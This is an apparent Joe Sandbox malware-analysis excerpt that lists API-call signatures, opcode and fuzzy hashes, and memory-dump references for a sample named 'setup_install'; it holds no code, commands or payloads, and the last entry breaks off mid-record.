                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalInitializeSection$CreateSemaphorecallocfree
                                        • String ID:
                                        • API String ID: 1811228352-3916222277
                                        • Opcode ID: 8dce45bf0f4a1604fd5450800ff6581d3d5fb2782b9fa5ecbae3cabdc757fef7
                                        • Instruction ID: 313e0f62ece04afce81432c9e1045f60dadc3f982ee79c67bbd2a5c0c4520fb3
                                        • Opcode Fuzzy Hash: 8dce45bf0f4a1604fd5450800ff6581d3d5fb2782b9fa5ecbae3cabdc757fef7
                                        • Instruction Fuzzy Hash: 1C212CB16893049FE720AF79D48435BFBE4EF90358F01896DD8888B706E779D4548BA2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$_fileno_lseeki64
                                        • String ID:
                                        • API String ID: 2364285915-0
                                        • Opcode ID: b9152af8a192fc4e4a201217e360f9288bbf3ac98fcb452379079d5eaee6a49a
                                        • Instruction ID: 31f8049920a24600f0d28c466d4af54221514a4519e0966fe1f650ae155001bf
                                        • Opcode Fuzzy Hash: b9152af8a192fc4e4a201217e360f9288bbf3ac98fcb452379079d5eaee6a49a
                                        • Instruction Fuzzy Hash: CD1182714047048FC7106F2AD9852AABBA0EF41374F544A5FF4A5CB3D2D7BC88D18B9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Time$System_errno$File
                                        • String ID:
                                        • API String ID: 2046127076-0
                                        • Opcode ID: 3fb4fe908cd66ddfb908f29957ebaf7ba64a4022bbe1d631883dbe67ca0733a8
                                        • Instruction ID: b6306bf031ef0a4e2691319f9754aed083b9743f0e69b31d815e0ee44317f2ce
                                        • Opcode Fuzzy Hash: 3fb4fe908cd66ddfb908f29957ebaf7ba64a4022bbe1d631883dbe67ca0733a8
                                        • Instruction Fuzzy Hash: 6411C275A482298FDB046F7DDD4429ABBF9FB49362F014669E819D7380E734D840CF90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: __dllonexit_lock_onexit_unlock
                                        • String ID:
                                        • API String ID: 209411981-0
                                        • Opcode ID: d0c3a9ed94e2b54d45497156b9f1bea6188bd2f3e777063a50ecf632aa452226
                                        • Instruction ID: 00753f483c55e7d385eedfec9ee2ef8be9ff0ffb994ba50dd904ad8ce8e8d864
                                        • Opcode Fuzzy Hash: d0c3a9ed94e2b54d45497156b9f1bea6188bd2f3e777063a50ecf632aa452226
                                        • Instruction Fuzzy Hash: 1F119DB494D3009FDB44EF78C48465EBBE8AF9A214F110D2DE8D487301E735D8848B92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentThreadprintf
                                        • String ID:
                                        • API String ID: 2356641437-0
                                        • Opcode ID: 6a210a498b10751ab6e1654c6d6fe8694076ab6935ec6d70936713250e627e46
                                        • Instruction ID: 28b5b81954f4f9c744cf1c9fd63a92fd92954022bcf05c894e8e310c70930a94
                                        • Opcode Fuzzy Hash: 6a210a498b10751ab6e1654c6d6fe8694076ab6935ec6d70936713250e627e46
                                        • Instruction Fuzzy Hash: 4211D0B4A99300AFDB44EFA9D48891ABBE4FF99254F51891DF88487350D734D840CF92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentThreadprintf
                                        • String ID:
                                        • API String ID: 2356641437-0
                                        • Opcode ID: 19156396b56a590405c14a23f5a5e4703b1477055e5a09f5f0949d1644b7ee8e
                                        • Instruction ID: bdb055779afb0fd26bc33813d7328b8d60a313d61dfc2f1691b64f0329c1f6a1
                                        • Opcode Fuzzy Hash: 19156396b56a590405c14a23f5a5e4703b1477055e5a09f5f0949d1644b7ee8e
                                        • Instruction Fuzzy Hash: F801DDB8A883108FD708DF25D08461ABBF4EF9A720F10895EE89987360C731D844CF93
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlenwcslen
                                        • String ID: (null)$(null)
                                        • API String ID: 803329031-1601437019
                                        • Opcode ID: fb0a1d84bde1a6a7b6b387445af3b784568de771ec2cf0aba19feeec33f1d149
                                        • Instruction ID: 64006f08bc41acdb28a0b7ae9be4a798cf91538c952830d8404801c30485cf07
                                        • Opcode Fuzzy Hash: fb0a1d84bde1a6a7b6b387445af3b784568de771ec2cf0aba19feeec33f1d149
                                        • Instruction Fuzzy Hash: 83F058307C87008BE700DF69CAD064AB3E2ABEA308BA0493995429B305CB71EC06C782
                                        APIs
                                        • pthread_getspecific.LIBWINPTHREAD-1(?,?,?,?,?,?,?,?,?,?,00496F3F), ref: 004114AA
                                        • pthread_once.LIBWINPTHREAD-1 ref: 004114EF
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004114FB
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00411512
                                        • calloc.MSVCRT ref: 00411531
                                        • pthread_setspecific.LIBWINPTHREAD-1 ref: 0041154E
                                        • realloc.MSVCRT ref: 004115DE
                                        • memset.MSVCRT ref: 0041160B
                                        • pthread_setspecific.LIBWINPTHREAD-1 ref: 0041161C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_setspecific$callocmemsetpthread_getspecificpthread_mutex_lockpthread_mutex_unlockpthread_oncerealloc
                                        • String ID:
                                        • API String ID: 2529906858-0
                                        • Opcode ID: 58ca43129f467f9e15ba4c1e01f92bdf99d5fc6b11543c8a6cf286f4727f27de
                                        • Instruction ID: 4b29056c85b61fd3b998f3ddf5e0eccf30de8ae3dfacd11a96d785cbe9c376a2
                                        • Opcode Fuzzy Hash: 58ca43129f467f9e15ba4c1e01f92bdf99d5fc6b11543c8a6cf286f4727f27de
                                        • Instruction Fuzzy Hash: DFF02472608310DBC700AF92A8C01EDB7E1BF457A4F05042FCA891B311D37CA8C48B8E
                                        APIs
                                          • Part of subcall function 004806B0: pthread_once.LIBWINPTHREAD-1 ref: 004806C2
                                        • pthread_mutex_lock.LIBWINPTHREAD-1(?,?,?,?,0048E0D7,?,?,?,?,?,?,?,?,0048F940), ref: 004829DB
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1(?,?,?,?,0048E0D7,?,?,?,?,?,?,?,?,0048F940), ref: 004829F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_once
                                        • String ID: lpJ
                                        • API String ID: 3726264613-129645102
                                        • Opcode ID: 732cbcd46f9e5dcc206907f758e5f94a8331d09dc7c96cde94f2323229aef86a
                                        • Instruction ID: a4587cf7444b7960373a5107b23579d614e6eabcaa7286321615072edc34a6de
                                        • Opcode Fuzzy Hash: 732cbcd46f9e5dcc206907f758e5f94a8331d09dc7c96cde94f2323229aef86a
                                        • Instruction Fuzzy Hash: F2C19AB0504A158BCB157F36C4C242EBAE2AF41748F025D3EE2866B653DF3C95458BDE
                                        APIs
                                          • Part of subcall function 004014C0: _onexit.MSVCRT ref: 004014CA
                                          • Part of subcall function 00485FA0: strlen.MSVCRT ref: 00485FBC
                                        • _ZN6curlpp7CleanupC1Ev.LIBCURLPP ref: 00402E1D
                                        • _ZN6curlpp4EasyC1Ev.LIBCURLPP ref: 00402E33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: CleanupEasyN6curlpp4N6curlpp7_onexitstrlen
                                        • String ID: D#J
                                        • API String ID: 1395134712-2691834849
                                        • Opcode ID: 09e8a9eb5b3311a1ff6ea2e09368e584fec020669553b1806f50b42d125cc548
                                        • Instruction ID: 2416718d4467e717c2b741a74c46b19bf757a44ec6b1276f3e62ad4e255e4475
                                        • Opcode Fuzzy Hash: 09e8a9eb5b3311a1ff6ea2e09368e584fec020669553b1806f50b42d125cc548
                                        • Instruction Fuzzy Hash: F63141705082459BCB00BFB6D14945DBAE4AF4134DF00C97FA9C4A73D6DBBC49449B9E
                                        APIs
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • fprintf.MSVCRT ref: 649437CD
                                        • exit.MSVCRT ref: 649437D9
                                          • Part of subcall function 649442C0: Sleep.KERNEL32(?,?,?,?,?,?,649432B2,?,?,?,?,649433EF,00000000,64944CE0), ref: 649442F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$exitfprintf
                                        • String ID: )
                                        • API String ID: 24197342-2427484129
                                        • Opcode ID: 1e6b0bedb79e20cb6436f7ef3fd4ab9f15e77d0ceb2a4a76bf1ae3db55ee9aed
                                        • Instruction ID: 8fb1d120b544473af7be147bcea549fd911136cc304502cd8c056e5f5ab2fb2b
                                        • Opcode Fuzzy Hash: 1e6b0bedb79e20cb6436f7ef3fd4ab9f15e77d0ceb2a4a76bf1ae3db55ee9aed
                                        • Instruction Fuzzy Hash: BC0112B46993108FEB18EF65E18161ABBE5FBA2308F14895CE4888B304C770C880CF93
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: fprintf
                                        • String ID: @YJ$Unknown error
                                        • API String ID: 383729395-4080997006
                                        • Opcode ID: 169516835eac8fd4a711075e8ab766066ca1f95bef1f4a8d8b7181d940d2b4a9
                                        • Instruction ID: ec98c9cee3fd9196747dcbc4b4f0b9be8c0ff0fb375eac1434920fe693c7accd
                                        • Opcode Fuzzy Hash: 169516835eac8fd4a711075e8ab766066ca1f95bef1f4a8d8b7181d940d2b4a9
                                        • Instruction Fuzzy Hash: 4901D6B0008B45CBC300AF15E58845ABFF1FF89354F82889DE5C446265CB3698A8CB4A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: strerrorstrlen
                                        • String ID: (null)
                                        • API String ID: 960536887-3941151225
                                        • Opcode ID: 7569459c97e79babe562827145dcc9f91a93986614a53b8d57c18acd574bf53b
                                        • Instruction ID: 67dbdf99aa2adb0ab23c76aca4b68b3eada1eb7750055d2b1cb733616639362e
                                        • Opcode Fuzzy Hash: 7569459c97e79babe562827145dcc9f91a93986614a53b8d57c18acd574bf53b
                                        • Instruction Fuzzy Hash: 0CD067707CC7008BD7049A75C5D065AA6E65BA9309F104D3ED58196341EA79D8018B42
                                        APIs
                                        • free.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,64945D2F,?,?,?,?,00000000), ref: 64944B6D
                                        • free.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,64945D2F,?,?,?,?,00000000), ref: 64944B7C
                                        • free.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,64945D2F,?,?,?,?,00000000), ref: 64944C4F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 2172cf5594b34ad121df7c23d4f986fad7bef48f4f330700a976f7d8243a56f1
                                        • Instruction ID: dda032daeb90cdbfa7e8290ac5656d5119f8cc1d429803c98167e20ef21b9799
                                        • Opcode Fuzzy Hash: 2172cf5594b34ad121df7c23d4f986fad7bef48f4f330700a976f7d8243a56f1
                                        • Instruction Fuzzy Hash: D1418F74AD93028FE714DF68C88279ABBEAFB96344F14866DD8448B344E775E044CF92
                                        APIs
                                        • EnterCriticalSection.KERNEL32 ref: 64942864
                                        • LeaveCriticalSection.KERNEL32 ref: 64942880
                                          • Part of subcall function 64941A70: EnterCriticalSection.KERNEL32 ref: 64941A84
                                          • Part of subcall function 64941A70: LeaveCriticalSection.KERNEL32 ref: 64941AAB
                                        • LeaveCriticalSection.KERNEL32 ref: 649428E3
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$Enter
                                        • String ID:
                                        • API String ID: 2978645861-0
                                        • Opcode ID: 144d1cdb2486664e6d23ee49b3a8b5b567b0fa6496f70557cebfe6cdbe3fdbb7
                                        • Instruction ID: 8400779ff4e597e953eb7ab96e45a5d6be5a7e91f66382f07338091f50ec0c52
